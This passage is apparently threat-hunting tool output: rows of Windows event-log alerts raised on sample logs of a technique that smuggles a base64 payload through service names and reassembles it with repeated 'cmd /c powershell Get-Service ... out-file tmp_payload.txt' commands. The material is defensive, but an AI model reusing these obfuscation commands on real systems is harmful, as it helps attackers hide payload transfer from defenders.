""seg235"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:20:55.527 +00:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: JEVSUk9SX0xPRyA9ICJFcnJvciINCg0KI1NldCBDb21wdXRlciBMaXN0IE9wdGlvbnMNCiMkaG9zdGRvbWFpbiA9IChHZXQtQUREb21haW4pLkROU1Jvb3QNCiRGSUxFX09QVCA9ICJJUCBMaXN0Ig | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg235"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - 
Tchopper.evtx" +2021-11-03 08:20:57.001 +00:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: 0KJERPTUFJTl9PUFQgPSAiRG9tYWluIg0KJExPQ0FMSE9TVF9PUFQgPSAiTG9jYWwgSG9zdCINCg0KDQpXcml0ZS1Mb2cgJElORk9fTE9HICJTdGFydGluZyBTY3JpcHQiDQoNCiMgRHJvcCBEb3du | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg236"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:20:57.001 +00:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: 0KJERPTUFJTl9PUFQgPSAiRG9tYWluIg0KJExPQ0FMSE9TVF9PUFQgPSAiTG9jYWwgSG9zdCINCg0KDQpXcml0ZS1Mb2cgJElORk9fTE9HICJTdGFydGluZyBTY3JpcHQiDQoNCiMgRHJvcCBEb3du | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg236"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:20:57.001 +00:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: 0KJERPTUFJTl9PUFQgPSAiRG9tYWluIg0KJExPQ0FMSE9TVF9PUFQgPSAiTG9jYWwgSG9zdCINCg0KDQpXcml0ZS1Mb2cgJElORk9fTE9HICJTdGFydGluZyBTY3JpcHQiDQoNCiMgRHJvcCBEb3du | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg236"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - 
Tchopper.evtx" +2021-11-03 08:20:58.464 +00:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: IE9wdGlvbnMNClthcnJheV0kQ29tcHV0ZXJMaXN0VHlwZU9wdGlvbnMgPSAkRklMRV9PUFQsICRMT0NBTEhPU1RfT1BULCAkRE9NQUlOX09QVA0KDQoNCiNTZXQgdGhlIGZ1bmN0aW9uIHZhcmlhYm | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg237"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:20:58.464 +00:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: IE9wdGlvbnMNClthcnJheV0kQ29tcHV0ZXJMaXN0VHlwZU9wdGlvbnMgPSAkRklMRV9PUFQsICRMT0NBTEhPU1RfT1BULCAkRE9NQUlOX09QVA0KDQoNCiNTZXQgdGhlIGZ1bmN0aW9uIHZhcmlhYm | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg237"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:20:58.464 +00:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: IE9wdGlvbnMNClthcnJheV0kQ29tcHV0ZXJMaXN0VHlwZU9wdGlvbnMgPSAkRklMRV9PUFQsICRMT0NBTEhPU1RfT1BULCAkRE9NQUlOX09QVA0KDQoNCiNTZXQgdGhlIGZ1bmN0aW9uIHZhcmlhYm | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg237"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - 
Tchopper.evtx" +2021-11-03 08:20:59.902 +00:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: xlcw0KJENvbXB1dGVyTGlzdFR5cGUgID0gR2V0LUlucHV0RnJvbURyb3BEb3duICRDb21wdXRlckxpc3RUeXBlT3B0aW9ucyAiSVAgTGlzdCBUeXBlIg0KDQoNCiNTZXQgdGhlIGZ1bmN0aW9uIHZh | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg238"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:20:59.902 +00:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: xlcw0KJENvbXB1dGVyTGlzdFR5cGUgID0gR2V0LUlucHV0RnJvbURyb3BEb3duICRDb21wdXRlckxpc3RUeXBlT3B0aW9ucyAiSVAgTGlzdCBUeXBlIg0KDQoNCiNTZXQgdGhlIGZ1bmN0aW9uIHZh | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg238"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:20:59.902 +00:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: xlcw0KJENvbXB1dGVyTGlzdFR5cGUgID0gR2V0LUlucHV0RnJvbURyb3BEb3duICRDb21wdXRlckxpc3RUeXBlT3B0aW9ucyAiSVAgTGlzdCBUeXBlIg0KDQoNCiNTZXQgdGhlIGZ1bmN0aW9uIHZh | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg238"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - 
Tchopper.evtx" +2021-11-03 08:21:01.359 +00:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: cmlhYmxlcw0KV3JpdGUtTG9nICRJTlBVVF9MT0cgIlNlbGVjdCBDb21wdXRlciBMaXN0Li4uIg0KDQokQ29tcHV0ZXJMaXN0ID0gR2V0LUNvbXB1dGVyTGlzdCAkQ29tcHV0ZXJMaXN0VHlwZQ0KJE | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg239"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:21:01.359 +00:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: cmlhYmxlcw0KV3JpdGUtTG9nICRJTlBVVF9MT0cgIlNlbGVjdCBDb21wdXRlciBMaXN0Li4uIg0KDQokQ29tcHV0ZXJMaXN0ID0gR2V0LUNvbXB1dGVyTGlzdCAkQ29tcHV0ZXJMaXN0VHlwZQ0KJE | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg239"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:21:01.359 +00:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: cmlhYmxlcw0KV3JpdGUtTG9nICRJTlBVVF9MT0cgIlNlbGVjdCBDb21wdXRlciBMaXN0Li4uIg0KDQokQ29tcHV0ZXJMaXN0ID0gR2V0LUNvbXB1dGVyTGlzdCAkQ29tcHV0ZXJMaXN0VHlwZQ0KJE | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg239"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - 
Tchopper.evtx" +2021-11-03 08:21:02.829 +00:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: NvbXB1dGVyQ291bnQgPSAkQ29tcHV0ZXJMaXN0LkNvdW50DQokR2xvYmFsOkNyZWQgPSAkTnVsbA0KJEdsb2JhbDpDb25uZWN0aW9uSXNzdWVzID0gMCANCg0KI1NldCBhbGwgZXJyb3JzIHRvIHRl | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg240"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:21:02.829 +00:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: NvbXB1dGVyQ291bnQgPSAkQ29tcHV0ZXJMaXN0LkNvdW50DQokR2xvYmFsOkNyZWQgPSAkTnVsbA0KJEdsb2JhbDpDb25uZWN0aW9uSXNzdWVzID0gMCANCg0KI1NldCBhbGwgZXJyb3JzIHRvIHRl | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg240"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:21:02.829 +00:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: NvbXB1dGVyQ291bnQgPSAkQ29tcHV0ZXJMaXN0LkNvdW50DQokR2xvYmFsOkNyZWQgPSAkTnVsbA0KJEdsb2JhbDpDb25uZWN0aW9uSXNzdWVzID0gMCANCg0KI1NldCBhbGwgZXJyb3JzIHRvIHRl | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg240"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - 
Tchopper.evtx" +2021-11-03 08:21:04.271 +00:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: cm1pbmF0aW5nDQokRXJyb3JBY3Rpb25QcmVmZXJlbmNlID0gIlN0b3AiDQoNCldyaXRlLUxvZyAkSU5GT19MT0cgIlNlbGVjdGVkOiAkQ29tcHV0ZXJMaXN0VHlwZSAoJENvbXB1dGVyQ291bnQgQ2 | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg241"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:21:04.271 +00:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: cm1pbmF0aW5nDQokRXJyb3JBY3Rpb25QcmVmZXJlbmNlID0gIlN0b3AiDQoNCldyaXRlLUxvZyAkSU5GT19MT0cgIlNlbGVjdGVkOiAkQ29tcHV0ZXJMaXN0VHlwZSAoJENvbXB1dGVyQ291bnQgQ2 | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg241"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:21:04.271 +00:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: cm1pbmF0aW5nDQokRXJyb3JBY3Rpb25QcmVmZXJlbmNlID0gIlN0b3AiDQoNCldyaXRlLUxvZyAkSU5GT19MT0cgIlNlbGVjdGVkOiAkQ29tcHV0ZXJMaXN0VHlwZSAoJENvbXB1dGVyQ291bnQgQ2 | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg241"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - 
Tchopper.evtx" +2021-11-03 08:21:05.712 +00:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: 9tcHV0ZXIocykgRm91bmQpIg0KDQojQ2FsbCBmdW5jdGlvbg0KJFRpbWUgPSBNZWFzdXJlLUNvbW1hbmQgLUV4cHJlc3Npb24gew0KICAgICRMb2dSZXBvcnQgPSBFeHBvcnQtTG9nUmVwb3J0ICRD | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg242"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:21:05.712 +00:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: 9tcHV0ZXIocykgRm91bmQpIg0KDQojQ2FsbCBmdW5jdGlvbg0KJFRpbWUgPSBNZWFzdXJlLUNvbW1hbmQgLUV4cHJlc3Npb24gew0KICAgICRMb2dSZXBvcnQgPSBFeHBvcnQtTG9nUmVwb3J0ICRD | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg242"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:21:05.712 +00:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: 9tcHV0ZXIocykgRm91bmQpIg0KDQojQ2FsbCBmdW5jdGlvbg0KJFRpbWUgPSBNZWFzdXJlLUNvbW1hbmQgLUV4cHJlc3Npb24gew0KICAgICRMb2dSZXBvcnQgPSBFeHBvcnQtTG9nUmVwb3J0ICRD | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg242"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - 
Tchopper.evtx" +2021-11-03 08:21:07.159 +00:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: b21wdXRlcmxpc3QgJENvbXB1dGVyQ291bnQgJENvbXB1dGVyTGlzdFR5cGUNCn0NCg0KJFRpbWUgPSBbbWF0aF06OlJvdW5kKCRUaW1lLlRvdGFsTWludXRlcywgMSkNCg0KV3JpdGUtTG9nICRJTk | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg243"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:21:07.159 +00:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: b21wdXRlcmxpc3QgJENvbXB1dGVyQ291bnQgJENvbXB1dGVyTGlzdFR5cGUNCn0NCg0KJFRpbWUgPSBbbWF0aF06OlJvdW5kKCRUaW1lLlRvdGFsTWludXRlcywgMSkNCg0KV3JpdGUtTG9nICRJTk | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg243"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:21:07.159 +00:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: b21wdXRlcmxpc3QgJENvbXB1dGVyQ291bnQgJENvbXB1dGVyTGlzdFR5cGUNCn0NCg0KJFRpbWUgPSBbbWF0aF06OlJvdW5kKCRUaW1lLlRvdGFsTWludXRlcywgMSkNCg0KV3JpdGUtTG9nICRJTk | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg243"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - 
Tchopper.evtx" +2021-11-03 08:21:08.597 +00:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: ZPX0xPRyAiRXZlbnQgTG9nIFJlcG9ydCBTdWNjZXNzZnVsbHkgQ2FsY3VsYXRlZCAmIEV4cG9ydGVkIC0gJENvbXB1dGVyQ291bnQgQ29tcHV0ZXJzIC0gJFRpbWUgTWludXRlcyAtICRHbG9iYWw6 | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg244"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:21:08.597 +00:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: ZPX0xPRyAiRXZlbnQgTG9nIFJlcG9ydCBTdWNjZXNzZnVsbHkgQ2FsY3VsYXRlZCAmIEV4cG9ydGVkIC0gJENvbXB1dGVyQ291bnQgQ29tcHV0ZXJzIC0gJFRpbWUgTWludXRlcyAtICRHbG9iYWw6 | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg244"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:21:08.597 +00:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: ZPX0xPRyAiRXZlbnQgTG9nIFJlcG9ydCBTdWNjZXNzZnVsbHkgQ2FsY3VsYXRlZCAmIEV4cG9ydGVkIC0gJENvbXB1dGVyQ291bnQgQ29tcHV0ZXJzIC0gJFRpbWUgTWludXRlcyAtICRHbG9iYWw6 | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg244"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - 
Tchopper.evtx" +2021-11-03 08:21:10.084 +00:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: Q29ubmVjdGlvbklzc3VlcyBDb25uZWN0aW9uIElzc3VlKHMpIg== | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg245"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:21:10.084 +00:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: Q29ubmVjdGlvbklzc3VlcyBDb25uZWN0aW9uIElzc3VlKHMpIg== | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg245"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:21:10.084 +00:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: Q29ubmVjdGlvbklzc3VlcyBDb25uZWN0aW9uIElzc3VlKHMpIg== | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg245"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:34:27.978 +00:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg1"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: 
C:\Windows\System32\cmd.exe | PID: 0xef4 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:34:27.993 +00:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg1"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xc10 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:34:27.993 +00:00,FS03.offsec.lan,4688,low,Exec,Non Interactive PowerShell,,rules/sigma/process_creation_builtin/proc_creation_win_non_interactive_powershell.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:34:29.447 +00:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg2"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x9d0 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:34:29.447 +00:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command 
""Get-Service ""seg2"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xab8 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:34:29.447 +00:00,FS03.offsec.lan,4688,low,Exec,Non Interactive PowerShell,,rules/sigma/process_creation_builtin/proc_creation_win_non_interactive_powershell.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:34:30.888 +00:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg3"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x7c0 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:34:30.888 +00:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg3"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xebc | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 
